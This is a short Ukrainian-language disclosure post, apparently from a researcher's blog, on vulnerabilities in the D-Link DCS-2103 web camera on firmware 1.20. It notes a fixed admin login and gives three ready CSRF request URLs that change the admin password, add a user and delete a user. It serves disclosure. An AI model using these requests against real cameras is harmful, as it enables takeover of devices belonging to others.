AoF та CSRF уразливості в D-Link DCS-2103

20:05 24.10.2015

24.07.2015

У серпні, 01.08.2014, я виявив Abuse of Functionality та Cross-Site Request Forgery уразливості в D-Link DCS-2103 (веб камера). Це четверта частина дірок в DCS-2103.

Раніше я писав про CSRF та XSS уразливості в D-Link DCS-2103.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

24.10.2015

Abuse of Functionality (WASC-42):

Фіксований логін адміна: admin. Що спрощує BF і CSRF атаки.

Cross-Site Request Forgery (WASC-09):

Зміна паролю адміна:

http://site/vb.htm?adduser=admin:password:0

Додавання користувача:

http://site/vb.htm?adduser=user:pass:2

Видалення користувача:

http://site/vb.htm?deluser=user

Уразлива версія D-Link DCS-2103, Firmware 1.20. Дана модель з іншими прошивками також повинна бути вразливою.


Leave a Reply

You must be logged in to post a comment.